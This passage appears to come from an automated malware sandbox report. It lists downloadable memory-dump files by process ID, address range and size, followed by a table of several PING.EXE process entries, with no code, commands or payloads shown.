memory/4128-30-0x0000000017E80000-0x0000000017E92000-memory.dmp

Filesize
72KB

Download
memory/4128-4392-0x0000000074B2E000-0x0000000074B2F000-memory.dmp

Filesize
4KB

Download
memory/4128-4-0x0000000005DE0000-0x0000000006384000-memory.dmp

Filesize
5.6MB

Download
memory/4128-31-0x0000000017EE0000-0x0000000017F1C000-memory.dmp

Filesize
240KB

Download
memory/4128-3-0x0000000074B20000-0x00000000752D0000-memory.dmp

Filesize
7.7MB

Download
memory/4128-4506-0x0000000074B20000-0x00000000752D0000-memory.dmp

Filesize
7.7MB

Download
memory/4128-1-0x0000000000D60000-0x0000000000DBE000-memory.dmp

Filesize
376KB

Download
memory/4128-9374-0x0000000074B20000-0x00000000752D0000-memory.dmp

Filesize
7.7MB

Download
memory/4128-2-0x00000000030A0000-0x00000000030C4000-memory.dmp

Filesize
144KB

Download
memory/4128-0-0x0000000074B2E000-0x0000000074B2F000-memory.dmp

Filesize
4KB

Download
memory/4348-8631-0x0000000000400000-0x0000000000541000-memory.dmp

Filesize
1.3MB

Download
memory/4348-9504-0x0000000006CC0000-0x0000000006CD4000-memory.dmp

Filesize
80KB

Download
memory/4348-8630-0x0000000000B20000-0x0000000000BBA000-memory.dmp

Filesize
616KB

Download
memory/4348-8633-0x0000000004B90000-0x0000000004C2C000-memory.dmp

Filesize
624KB

Download
memory/4348-8635-0x0000000005240000-0x00000000052A6000-memory.dmp

Filesize
408KB

Download
memory/4348-8634-0x0000000005200000-0x0000000005244000-memory.dmp

Filesize
272KB

Download
memory/4348-9503-0x0000000006C60000-0x0000000006CB0000-memory.dmp

Filesize
320KB

Download
memory/4580-219-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-159-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-178-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-182-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-180-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-191-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-210-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-138-0x00000000060C0000-0x0000000006610000-memory.dmp

Filesize
5.3MB

Download
memory/4580-222-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-212-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-203-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-193-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-201-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-189-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-187-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-185-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-176-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-170-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-161-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-174-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-168-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-166-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-3444-0x00000000079B0000-0x0000000007A5A000-memory.dmp

Filesize
680KB

Download
memory/4580-3323-0x000000000BC40000-0x000000000C320000-memory.dmp

Filesize
6.9MB

Download
memory/4580-163-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-172-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-156-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-157-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-149-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-151-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-141-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-147-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-140-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-153-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-145-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-143-0x0000000005B70000-0x00000000060B9000-memory.dmp

Filesize
5.3MB

Download
memory/4580-139-0x0000000005B70000-0x00000000060BE000-memory.dmp

Filesize
5.3MB

Download
memory/4764-6358-0x000001DAE98F0000-0x000001DAE9912000-memory.dmp

Filesize
136KB

Download
memory/5332-4305-0x0000000000620000-0x00000000006AA000-memory.dmp

Filesize
552KB

Download
memory/5772-8046-0x00000176A0D70000-0x00000176A0D82000-memory.dmp

Filesize
72KB

Download
memory/5772-6297-0x00000176862C0000-0x0000017686300000-memory.dmp

Filesize
256KB

Download
memory/5772-7994-0x00000176A0A20000-0x00000176A0A96000-memory.dmp

Filesize
472KB

Download
memory/5772-7999-0x00000176A09D0000-0x00000176A09EE000-memory.dmp

Filesize
120KB

Download
memory/5772-8045-0x00000176A0A10000-0x00000176A0A1A000-memory.dmp

Filesize
40KB

Download
memory/5852-9373-0x0000000001450000-0x0000000001474000-memory.dmp

Filesize
144KB

Download
memory/5852-9371-0x0000000000AE0000-0x0000000000AF2000-memory.dmp

Filesize
72KB

Download
memory/5948-4370-0x000000001CBE0000-0x000000001CC30000-memory.dmp

Filesize
320KB

Download
memory/5948-4371-0x000000001CCF0000-0x000000001CDA2000-memory.dmp

Filesize
712KB

Download
memory/5948-4461-0x000000001D3E0000-0x000000001D908000-memory.dmp

Filesize
5.2MB

Download

pid	process
4188	PING.EXE
2376	PING.EXE
4628	PING.EXE
5848	PING.EXE
3256	PING.EXE
2788	PING.EXE
6416	PING.EXE